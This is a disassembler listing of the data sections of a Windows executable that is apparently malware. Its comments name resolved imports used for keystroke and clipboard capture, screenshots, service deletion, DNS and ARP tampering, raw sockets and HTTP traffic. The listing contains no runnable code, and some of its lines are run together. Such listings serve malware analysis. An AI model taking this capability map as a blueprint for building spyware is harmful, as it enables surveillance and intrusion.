dword_4412E0 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_409794+A6D�r ...
dword_4412E4 dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_409794+F2�r
dword_4412E8 dd 0 ; resolved to->GDI32.GetDIBColorTable ; sub_409794+462�w ...
dword_4412EC dd 0 ; resolved to->WS2_32.ntohl ; sub_409794+5D8�w
dword_4412F0 dd 0 ; sub_409794+A08�r
dword_4412F4 dd 0 ; resolved to->WS2_32.ntohs ; sub_409794+5CB�w ...
dword_4412F8 dd 0 ; sub_409794+B21�w
dword_4412FC dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_409794+84F�r ...
dword_441300 dd 0 ; resolved to->USER32.ExitWindowsEx ; sub_40AB95+15�r
dword_441304 dd 0 ; sub_409794+9F0�r ...
dword_441308 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_409794+3B9�r ...
dword_44130C dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_409794+3C1�r ...
dword_441310 dd 0 ; sub_40894E+2B�r ...
dword_441314 dd 0 ; resolved to->WS2_32.getpeernamedword_441318 dd 0 ; resolved to->WS2_32.WSACleanup ; sub_401A6D:loc_401D13�r ...
dword_44131C dd 0 ; resolved to->GDI32.DeleteObject ; sub_409794+496�w
dword_441320 dd 0 ; sub_409794+A20�r ...
dword_441324 dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_409794+2DE�r ...
dword_441328 dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_409794+DA�r ...
dword_44132C dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_409794+B75�r ...
dword_441330 dd 0 ; resolved to->WS2_32.WSAStartup ; sub_401A6D+2F�r ...
dword_441334 dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_409794+872�r ...
dword_441338 dd 0 ; sub_409794+9F8�r
dword_44133C dd 0 ; sub_404969+70�r ...
dword_441340 dd 0 ; resolved to->USER32.GetForegroundWindow ; sub_402368+63�r ...
dword_441344 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_409794+910�r ...
dword_441348 dd 0 dword_44134C dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_401447+3C�r ...
dword_441350 dd 0 ; resolved to->WININET.InternetOpenA ; sub_409794+855�r
dword_441354 dd 0 ; resolved to->USER32.GetWindowTextA ; sub_402368+7C�r ...
dword_441358 dd 0 ; resolved to->USER32.IsWindow ; sub_408755+69�r ...
dword_44135C dd 0 ; resolved to->WS2_32.getsockname ; sub_409794+786�r ...
dword_441360 dd 0 ; resolved to->WS2_32.connect ; sub_404197+5E�r ...
dword_441364 dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_402E92+12C�r ...
dword_441368 dd 0 ; sub_409794:loc_40A06F�w ...
dword_44136C dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_409794+2C6�r ...
dword_441370 dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_409794+681�w ...
dword_441374 dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_409794+323�r ...
dword_441378 dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_409794+3D1�r ...
dword_44137C dd 0 ; sub_404969+1C5�r ...
dword_441380 dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_409794+86A�r ...
dword_441384 dd 0 ; resolved to->USER32.GetAsyncKeyState ; sub_402368+297�r ...
dword_441388 dd 0 ; resolved to->USER32.OpenClipboard ; sub_409794+1D2�r ...
dword_44138C dd 0 ; resolved to->WININET.InternetConnectA ; sub_409794+87A�r ...
dword_441390 dd 0 ; resolved to->WSOCK32.recvfrom ; sub_409794+606�w ...
dword_441394 dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_409794+2BF�w ...
dword_441398 dd 0 ; resolved to->WSOCK32.setsockopt ; sub_401447+AA�r ...
dword_44139C dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_409794+316�r ...
dword_4413A0 dd 0 ; resolved to->WS2_32.select ; sub_406B85+1FC�r ...
dword_4413A4 dd 0 ; resolved to->GDI32.CreateDCA ; sub_409794+42E�w ...
dword_4413A8 dd 0 ; resolved to->USER32.GetClipboardData ; sub_409794+1DA�r ...
dword_4413AC dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_409794+39C�r ...
dword_4413B0 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_4413B4 dd 0 ; resolved to->WS2_32.ntohl ; sub_4010B2+1F9�r ...
dword_4413B8 dd 0 ; resolved to->WS2_32.ntohs ; sub_4010B2+9D�r ...
dword_4413BC dd 0 ; resolved to->KERNEL32.Process32First ; sub_409794+C2�r ...
dword_4413C0 dd 0 ; resolved to->GDI32.GetDeviceCaps ; sub_40851A+38�r ...
dword_4413C4 dd 0 ; resolved to->USER32.FindWindowA ; sub_409794+1BA�r ...
dword_4413C8 dd 0 ; sub_40EB6D+72�r
dword_4413CC dd 0 ; resolved to->WS2_32.gethostname ; sub_409794+667�w ...
dword_4413D0 dd 0 ; resolved to->WSOCK32.recv ; sub_402E92+1C2�r ...
dword_4413D4 dd 0 ; sub_404969+291�r ...
dword_4413D8 dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_409794+BA�r ...
dword_4413DC dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_409794+2CE�r ...
dword_4413E0 dd 0 ; resolved to->WS2_32.listen ; sub_407B45+9C�r ...
dword_4413E4 dd 0 ; resolved to->WS2_32.bind ; sub_402E92+AD�r ...
dword_4413E8 dd 0 ; sub_40F6F1+4717�r
dword_4413EC dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_40C1D5+205�r ...
dword_4413F0 dd 0 dword_4413F4 dd 0 ; sub_409794+BB8�w ...
dword_4413F8 dd 0 ; resolved to->WS2_32.inet_addr ; sub_401447+1A0�r ...
dword_4413FC dd 0 ; resolved to->GDI32.CreateDIBSection ; sub_409794+43B�w ...
dword_441400 dd 0 ; resolved to->GDI32.BitBlt ; sub_409794+47C�w ...
dword_441404 dd 0 ; resolved to->GDI32.CreateCompatibleDC ; sub_409794+448�w ...
dword_441408 dd 0 ; resolved to->WS2_32.send ; sub_403E35+249�r ...
dword_44140C dd 0 ; resolved to->USER32.CloseClipboard ; sub_409794+1E2�r ...
dword_441410 dd 0 ; sub_409794+A28�r ...
dword_441414 dd 0 ; resolved to->USER32.SendMessageA ; sub_408755+7F�r ...
dword_441418 dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_409794+E2�r ...
dword_44141C dd 0 ; resolved to->WS2_32.sendto ; sub_401447+2DA�r ...
dword_441420 dd 0 ; sub_404D78+4CF�r ...
dword_441424 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_415B28+55�r
dword_441428 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_409794+27E�w ...
dword_44142C dd 0 ; resolved to->SHELL32.SHChangeNotifydword_441430 dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_40AECD+CE�r
dword_441434 dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_409794+AB7�r ...
dword_441438 dd 0 ; resolved to->WS2_32.socket ; sub_401D79+55�r ...
dword_44143C dd 0 ; resolved to->WS2_32.gethostbyname ; ___:00407D55�r ...
dword_441440 dd 0 ; sub_409794+BC5�w ...
dword_441444 dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_406B85+250�r ...
dword_441448 dd 0 ; sub_409794+A00�r ...
dword_44144C dd 0 ; resolved to->WS2_32.accept ; sub_407B45+B3�r ...
dword_441450 dd 0 ; resolved to->WS2_32.closesocket ; sub_401447+2F0�r ...
dword_441454 dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_405A6A+39F�r ...
dword_441458 dd 0 ; sub_403A47+C8�r ...
dword_44145C dd 0 ; resolved to->WS2_32.WSASocketA ; sub_401A6D+4F�r ...
dword_441460 dd 0 ; sub_409794+AFA�w ...
dword_441464 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_409794+AD�r ...
dword_441468 dd 0 ; resolved to->USER32.DestroyWindow ; sub_40894E+232�r ...
align 10h
dword_441470 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_409794+91D�r ...
dword_441474 dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_409794+EA�r ...
dword_441478 dd 0 ; sub_409794+12B�w ...
dword_44147C dd 0 ; sub_40A421+1C�r
dword_441480 dd 0 ; sub_409794:loc_4099E9�w ...
dword_441484 dd 0 ; sub_40A421+50�r
dword_441488 dd 0 ; sub_409794:loc_409AC3�w ...
dword_44148C dd 0 ; sub_40A421+84�r
dword_441490 dd 0 ; sub_40A421:loc_40A4D1�r
dword_441494 dd 0 ; sub_40A421+B8�r
dword_441498 dd 0 ; sub_40A421:loc_40A505�r
dword_44149C dd 0 ; sub_40A421+EC�r
dword_4414A0 dd 0 ; sub_409794+8D1�w ...
dword_4414A4 dd 0 ; sub_40A421+120�r
dword_4414A8 dd 0 ; sub_40A421:loc_40A56D�r ...
dword_4414AC dd 0 ; sub_40A421+154�r
dword_4414B0 dd 0 ; sub_40A421:loc_40A5A1�r ...
dword_4414B4 dd 0 ; sub_40A421+188�r
dword_4414B8 dd 0 ; sub_40A421:loc_40A5D5�r
dword_4414BC dd 0 ; sub_40A421+1BC�r
dword_4414C0 dd 0 ; sub_40A421:loc_40A609�r
dword_4414C4 dd 0 ; sub_40A421+1F0�r
dword_4414C8 dd 0 ; sub_40A421:loc_40A63D�r
dword_4414CC dd 0 ; sub_40A421+224�r
dword_4414D0 dd 0 ; sub_40A421:loc_40A671�r
dword_4414D4 dd 0 ; sub_40A421+258�r
dword_4414D8 dd 0 ; sub_40A421:loc_40A6A5�r
dword_4414DC dd 0 ; sub_40A421+28C�r
dword_4414E0 dd 0 ; sub_40A421:loc_40A6D9�r
dword_4414E4 dd 0 ; sub_40A421+2C0�r
dword_4414E8 dd 81h dup(0) dword_4416EC dd 5 dup(0) dword_441700 dd 0 ; sub_40F6F1+629D�o ...
dword_441704 dd 0 ; sub_40B8EC+54�r ...
dword_441708 dd 0 ; sub_40B8EC+37�r ...
dword_44170C dd 0 ; sub_40BA41+83�o
dword_441710 dd 0 ; sub_40BA41+11B�w
dword_441714 dd 0Dh dup(0) ; sub_40BA41:loc_40BB7E�o
dword_441748 dd 0 ; sub_40B8EC+EC�r ...
align 10h
dword_441750 dd 0Eh dup(0) dword_441788 dd 0FF2h dup(0) ; sub_40C597�o ...
dword_445750 dd 0Eh dup(0) dword_445788 dd 0 ; sub_40C597+E�o ...
dword_44578C dd 0Eh dup(0) dword_4457C4 dd 2 dup(0) dword_4457CC dd 17h dup(0) ; sub_40DDD4+131�o ...
dword_445828 dd 80h dup(0) ; sub_40EB6D+A5�o
dword_445A28 dd 0 ; sub_40E14E+4D�r ...
dword_445A2C dd 17h dup(0) ; sub_40EA39+12D�o
dword_445A88 dd 80h dup(0) ; sub_40E08F+7D�o ...
byte_445C88 db 0 ; DATA XREF: sub_40E14E+29�r
; sub_40E14E+34�w
align 4
dword_445C8C dd 80h dup(0) ; sub_40E3A5+88�o ...
dword_445E8C dd 81h dup(0) ; sub_40DCAB+50�o ...
dword_446090 dd 0 ; sub_40C3FF+44�r ...
dd 5 dup(0)
dword_4460A8 dd 0 ; sub_40F6F1+BCE�r
dd 2D9h dup(0)
dword_446C10 dd 0 ; sub_40C3FF+2D�o ...
dd 7Fh dup(0)
dword_446E10 dd 0 ; sub_416F93+40�w ...
dword_446E14 dd 0 ; sub_4076D2:loc_407719�r ...
dword_446E18 dd 0 ; sub_416E58+52�w ...
dword_446E1C dd 0 ; sub_405A6A+7E�w ...
dword_446E20 dd 0 ; ___:00407F07�r ...
dword_446E24 dd 0 ; sub_4071BD+122�w ...
byte_446E28 db 0 ; DATA XREF: sub_40F326+E2�o
; sub_40F6F1+346E�r ...
align 4
dd 2488h dup(0)
db 0
byte_45004D db 3 dup(0) ; DATA XREF: ___:0042AC28�o
dd 10003h dup(0)
dword_49005C dd 937Eh dup(0) db 0
byte_4B4E55 db 3 dup(0) ; DATA XREF: ___:off_43AE18�o
dd 7CBEh dup(0)
db 2 dup(0)
word_4D4152 dw 0 ; DATA XREF: ___:off_42DD54�o
dd 2FBDh dup(0)
db 0
byte_4E0049 db 3 dup(0) ; DATA XREF: ___:0042AC14�o
dd 1040h dup(0)
dword_4E414C dd 2FBEh dup(0) dword_4F0044 dd 5500h dup(0) db 2 dup(0)
word_505446 dw 0 ; DATA XREF: ___:off_424C70�o
dd 401Eh dup(0)
dword_5154C0 dd 0 ; ___:0040EC75�w ...
align 8
dword_5154C8 dd 0 dword_5154CC dd 20h dup(0) ; ___:0040F289�o ...
dword_51554C dd 10h dup(0) ; sub_40F6F1+920�o
dword_51558C dd 24h dup(0) dword_51561C dd 0 ; ___:0040F2A0�w ...
dword_515620 dd 0 align 10h
dword_515630 dd 0 dword_515634 dd 0 byte_515638 db 0 ; DATA XREF: sub_40F576+28�r
; sub_40F576+30�o
align 4
byte_51563C db 0 ; DATA XREF: ___:loc_40F2C2�r
; ___:0040F2D0�o
align 10h
dword_515640 dd 0 dword_515644 dd 0 dword_515648 dd 0 dword_51564C dd 0 ; ___:0040F254�r ...
dword_515650 dd 0 ; sub_40F6F1+8C4�r
dword_515654 dd 1Bh dup(0) dword_5156C0 dd 0 ; sub_4170BF+19�o
dword_5156C4 dd 65h dup(0) byte_515858 db 0 ; DATA XREF: sub_416D51+6A�r
; sub_416D51+98�w
align 10h
dword_515860 dd 0 ; sub_418000+A4�w
align 8
word_515868 dw 0 ; DATA XREF: sub_418000+55�r
; sub_418000+9A�o
word_51586A dw 0 ; DATA XREF: sub_418000+48�r
db 2 dup(0)
word_51586E dw 0 ; DATA XREF: sub_418000+3B�r
word_515870 dw 0 ; DATA XREF: sub_418000+2E�r
word_515872 dw 0 ; DATA XREF: sub_418000+21�r
align 8
dword_515878 dd 0 ; sub_41824D+91�w
align 10h
dword_515880 dd 0 dword_515884 dd 0 ; sub_417DAD+1B9�w ...
dword_515888 dd 0 ; sub_41B397:loc_41B431�w ...
dword_51588C dd 0 dd 4 dup(0)
dword_5158A0 dd 0 ; ___:0041CD71�w
dword_5158A4 dd 0 ; ___:0040EF62�r ...
dd 0
dword_5158AC dd 0 ; sub_41EFBB+9�r ...
dword_5158B0 dd 0 dword_5158B4 dd 0 ; sub_41FAC2+4�r ...
dd 0
dword_5158BC dd 0 dd 0
byte_5158C4 db 0 ; DATA XREF: sub_418FB9+2D�w
; sub_41D677+5�r
align 4
dword_5158C8 dd 0 dword_5158CC dd 0 ; sub_418FB9+8B�w
dword_5158D0 dd 0 ; ___:loc_41CC7B�r ...
align 8
dword_5158D8 dd 0 dword_5158DC dd 0 ; sub_418C3F:loc_418D3B�r ...
dword_5158E0 dd 0 dword_5158E4 dd 2 dup(0) dword_5158EC dd 0 ; sub_417CAE:loc_417D7B�r ...
dd 3 dup(0)
dword_5158FC dd 0 ; sub_417CAE+BF�r ...
dd 0
dword_515904 dd 0 ; sub_41BC2B+4C�w ...
dword_515908 dd 0 ; sub_41C195+4�w ...
dword_51590C dd 0 ; sub_41C6E1+1A�r ...
byte_515910 db 0 ; DATA XREF: sub_41C5DD+3�r
; sub_41C5DD+98�r ...
align 4
dword_515914 dd 0 ; sub_41C7BF+21�w ...
byte_515918 db 0 ; DATA XREF: sub_41C7BF+51�w
align 4
dword_51591C dd 0 dd 0
dword_515924 dd 0 ; ___:0041CA91�w ...
dword_515928 dd 41h dup(0) dword_515A2C dd 0 ; ___:0041CF50�w ...
dword_515A30 dd 0 dword_515A34 dd 0 ; sub_41C981:loc_41C9AA�w ...
dword_515A38 dd 0 ; sub_41D6F3:loc_41D75D�w
align 10h
dword_515A40 dd 0 ; sub_41DD12+63�w ...
align 8
dword_515A48 dd 0 ; sub_41DD12+46�r
dword_515A4C dd 10h dup(0) word_515A8C dw 0 ; DATA XREF: sub_41DF70+A8�r
word_515A8E dw 0 ; DATA XREF: sub_41DD12+54�r
; sub_41DF70+DB�r ...
word_515A90 dw 0 ; DATA XREF: sub_41DF70+CA�r
word_515A92 dw 0 ; DATA XREF: sub_41DF70+D3�r
; sub_41DF70:loc_41E062�r
word_515A94 dw 0 ; DATA XREF: sub_41DF70+C0�r
word_515A96 dw 0 ; DATA XREF: sub_41DF70+B8�r
word_515A98 dw 0 ; DATA XREF: sub_41DF70+B0�r
word_515A9A dw 0 ; DATA XREF: sub_41DF70+9E�r
dword_515A9C dd 0 dword_515AA0 dd 10h dup(0) word_515AE0 dw 0 ; DATA XREF: sub_41DF70+46�r
word_515AE2 dw 0 ; DATA XREF: sub_41DD12:loc_41DD89�r
; sub_41DF70+78�r ...
word_515AE4 dw 0 ; DATA XREF: sub_41DF70+67�r
word_515AE6 dw 0 ; DATA XREF: sub_41DF70+70�r
; sub_41DF70:loc_41DFF4�r
word_515AE8 dw 0 ; DATA XREF: sub_41DF70+5D�r
word_515AEA dw 0 ; DATA XREF: sub_41DF70+55�r
word_515AEC dw 0 ; DATA XREF: sub_41DF70+4D�r
word_515AEE dw 0 ; DATA XREF: sub_41DF70+3E�r
dword_515AF0 dd 0 dword_515AF4 dd 0 ; sub_41DD12:loc_41DE5E�r ...
dword_515AF8 dd 0 dword_515AFC dd 0 word_515B00 dw 0 ; DATA XREF: sub_41ECF8+1A�o
; sub_41ECF8+46�r
byte_515B02 db 0 ; DATA XREF: sub_41ECF8+39�r
align 4
dword_515B04 dd 7 dup(0) dword_515B20 dd 0 ; sub_41ECF8+5C�o
dword_515B24 dd 0 dword_515B28 dd 0 dword_515B2C dd 0 dword_515B30 dd 0 ; resolved to->USER32.MessageBoxA ; sub_41EE5D+2E�w ...
dword_515B34 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_41EE5D:loc_41EEAC�r
dword_515B38 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_41EE5D+60�r
dword_515B3C dd 0 dword_515B40 dd 0 ; sub_41FE42+48�w ...
dword_515B44 dd 0 ; sub_4205FA+4C�w ...
dword_515B48 dd 0 ; sub_420885:loc_4208EF�w
dword_515B4C dd 0 ; sub_41B9C1+14�r ...
dd 4 dup(0)
dword_515B60 dd 400h dup(0) ; ___:0043BB80�o
dword_516B60 dd 0 ; sub_41B515+56�r ...
dd 7 dup(0)
dword_516B80 dd 0 ; sub_41B582+75�r ...
dword_516B84 dd 3Fh dup(0) dword_516C80 dd 0 ; sub_41B65B+C�r ...
dword_516C84 dd 0 ; sub_41BFFC+65�w ...
align 10h
dword_516C90 dd 3 dup(0) ; sub_41BFFC+171�o ...
dword_516C9C dd 0 ; sub_41BFFC+15D�w ...
byte_516CA0 db 0 ; DATA XREF: sub_41C23B:loc_41C347�w
; sub_41C23B:loc_41C364�w ...
align 4
dd 3Fh dup(0)
byte_516DA0 db 0 ; DATA XREF: sub_41BFFC+5C�o
; sub_41BFFC+AF�o ...
byte_516DA1 db 0 ; DATA XREF: sub_418AA8+5D�r
; sub_41BFFC+A0�w ...
align 4
dd 40h dup(0)
dword_516EA4 dd 0 ; sub_41BFFC+12B�w ...
dword_516EA8 dd 0 ; sub_41A2B6+32�w
dword_516EAC dd 0 ; sub_419C82+259�r ...
dword_516EB0 dd 0 ; sub_419FAD:loc_419FFD�r ...
dword_516EB4 dd 0 ; sub_419C82+25F�r ...
dword_516EB8 dd 0 ; sub_419C82+2CA�r ...
dword_516EBC dd 0 ; sub_419C82+2CF�r ...
dword_516EC0 dd 0 ; sub_417C62+21�r ...
dword_516EC4 dd 0 ; ___:0041CD09�r
dword_516EC8 dd 0 dword_516ECC dd 0 ; sub_41C3C0+11�w ...
dword_516ED0 dd 0 dword_516ED4 dd 0 ; sub_418FB9+57�r
align 200h
___ ends
; Section 2. (virtual address 00117000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00117000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rsrc___ segment para public 'DATA' use32
assume cs:_rsrc___
;org 517000h
align 2000h
_rsrc___ ends
; Section 3. (virtual address 00118000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00118000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata__ segment para public 'DATA' use32
assume cs:_idata__
;org 518000h
dd 400h dup(0)
_idata__ ends
; Section 4. (virtual address 00119000)
; Virtual size : 000C5000 ( 806912.)
; Section size in file : 000C5000 ( 806912.)
; Offset to raw data for section: 00119000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
ud2_____ segment para public 'DATA' use32
assume cs:ud2_____
;org 519000h
dd 1C11h dup(0)
db 0
byte_520045 db 3 dup(0) ; DATA XREF: ___:0042AC08�o
; ___:0042AC20�o
dd 4003h dup(0)
db 0
byte_530055 db 3 dup(0) ; DATA XREF: ___:off_42AC04�o
; ___:off_42AC1C�o
dd 50FEh dup(0)
dword_544450 dd 2BCh dup(0) db 2 dup(0)
word_544F42 dw 0 ; DATA XREF: ___:off_424C78�o
dd 103h dup(0)
dword_545350 dd 0AB45h dup(0) db 0
align 4
dd 3FF7h dup(0)
db 2 dup(0)
word_580046 dw 0 ; DATA XREF: ___:off_425F7C�o
; ___:00425F84�o ...
dd 13C1h dup(0)
db 2 dup(0)
word_584F4E dw 0 ; DATA XREF: ___:00429E28�o
dd 0EC35h dup(0)
dword_5C0024 dd 0Eh dup(0) dword_5C005C dd 0E79h dup(0) db 0
byte_5C3A41 db 2 dup(0) ; DATA XREF: ___:off_42DE00�o
byte_5C3A43 db 0 ; DATA XREF: ___:off_43AEF0�o
dword_5C3A44 dd 44C5h dup(0) db 3 dup(0)
byte_5D4D5B db 0 ; DATA XREF: ___:off_43AE48�o
dd 24A9h dup(0)
ud2_____ ends
; Section 5. (virtual address 001DE000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 001DE000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_gda_ segment para public 'CODE' use32
assume cs:_gda_
;org 5DE000h
assume es:nothing, ss:nothing, ds:___, fs:nothing, gs:nothing
public start
start dd 400h dup(0)
_gda_ ends
; Section 6. (virtual address 001DF000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 001DF000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 5DF000h
align 2000h
_idata2 ends
end start